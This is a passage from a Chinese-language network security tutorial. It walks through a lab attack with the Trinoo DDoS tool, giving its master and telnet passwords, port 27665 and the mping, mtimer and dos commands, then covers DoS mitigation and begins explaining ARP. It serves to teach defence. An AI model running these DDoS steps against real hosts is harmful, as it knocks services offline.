明:
图5
我们来看一次攻击的实例:
被攻击的目标主机victim IP为:192.168.1.45 ns被植入三台sun的主机里,他们的IP对应关系分别为 client1:192.168.1.11 client2:192.168.1.12 client3:192.168.1.13 master所在主机为masterhost:192.168.1.14 首先我们要启动各个进程,在client1,2,3上分别执行ns,启动攻击守护进程, 其次,在master所在主机启动master masterhost# ./master ?? gOrave (系统示输入密码,输入gOrave后master成功启动) Trinoo v1.07d2+f3+c [Mar 20 2000:14:38:49] (连接成功) 在任意一台与网络连通的可使用telnet的设备上,执行: telnet 192.168.1.14 27665 Escape character is '^]'. betaalmostdone (输入密码) Trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] Trinoo> (进入提示符) Trinoo> mping (我们首先来监测一下各个攻击守护进程是否成功启动) mping: Sending a PING to every Bcasts. Trinoo> PONG 1 Received from 192.168.1.11 PONG 2 Received from 192.168.1.12 PONG 3 Received from 192.168.1.13 (成功响应) Trinoo> mtimer 60 (设定攻击时间为60秒) mtimer: Setting timer on bcast to 60. Trinoo> dos 192.168.1.45 DoS: Packeting 192.168.1.45...... 至此一次攻击结束,此时ping 192.168.1.45,会得到icmp不可到达反馈, 目标主机此时与网络的正常连接已被破坏。由于Trinoo尚未采用IP地址欺 骗,因此在被攻击的主机系统日志里我们可以看到如下纪录: Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection. Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 192.168.1.11.59841:The message has a wrong header type (0x0) Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 192.168.1.12.43661:The message has a wrong header type (0x0) Mar 20 14:40:36 victim snmpdx: error while receiving a pdu from 192316831.13.40183:The message has a wrong header type (0x0) Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0). Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1. Mar 20 14:40:36 victim snmpXdmid: Will attempt to re-establish connection. Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0). Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1. 由上述日志,我们不难看出发起攻击的IP地址,这一问题,通过IP spoof在后期的软件TFN,TFN2K等软件中得到了解决,给被攻击者找出肇事者进一步增加了难度。 4 DoS 与DDoS攻击的检测与防范
从 DoS 与DDoS攻击过程可以看出,其攻击的目的主要有: (1)对网络带宽的流量攻击;
(2)对服务器某特定服务的攻击。攻击的手段主要是发送大量垃圾数据交由网络设备或服务器处理,导致资源占用超出允许上限,使网络中断或无法提供正常服务。
由于DoS 、DDoS是利用网络协议的缺陷进行的攻击,所以要完全消除攻击的危害是非常困难的。从理论上说,只要是带宽或服务器资源有限的系统都会受到 DoS 或 DDoS攻击的威胁。对于暴力型DDoS攻击,即使是最先进的防火墙也无能为力。攻击者可能无法越过防火墙攻击内部网络中的服务器系统,但防火墙阻挡这些攻击数据包,必须付出高额的资源开支,这同样会造成网络性能下降,甚至网络中断。在实际应用中,我们可以通过一些方法检测到攻击现象的出现,并减缓攻击造成的危害。 二 ARP攻击原理及其防范 1 ARP攻击原理
ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的
MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
每台安装有TCP/IP协议的电脑里都有一个ARP缓存表,表里的IP地址与MAC地址是一一对应的,如下所示。 主机 IP地址 MAC地址 A 192.168.16.1 aa-aa-aa-aa-aa-aa B 192.168.16.2 bb-bb-bb-bb-bb-bb C 192.168.16.3 cc-cc-cc-cc-cc-cc D 192.168.16.4 dd-dd-dd-dd-dd-dd
我们以主机A(192.168.16.1)向主机B(192.168.16.2)发送数据为例。当发送数据时,主机A会在自己的ARP缓存表中寻找是否有目标IP地址。如果找到了,也就知道了目标MAC地址,直接把目标MAC地址写入帧里面发送就可以了;如果在ARP缓存表中没有找到相对应的IP地址,主机A就会在网络上发送一个广播,目标MAC地址是“FF.FF.FF.FF.FF.FF”,这表示向同一网段内的所有主机发出这样的询问:“192.168.16.2的MAC地址是什么?”网络上其他主机并不响应ARP询问,只有主机B接收到这个帧时,才向主机A做出这样的回应:“192.168.16.2的MAC地址是bb-bb-bb-bb-bb-bb”。这样,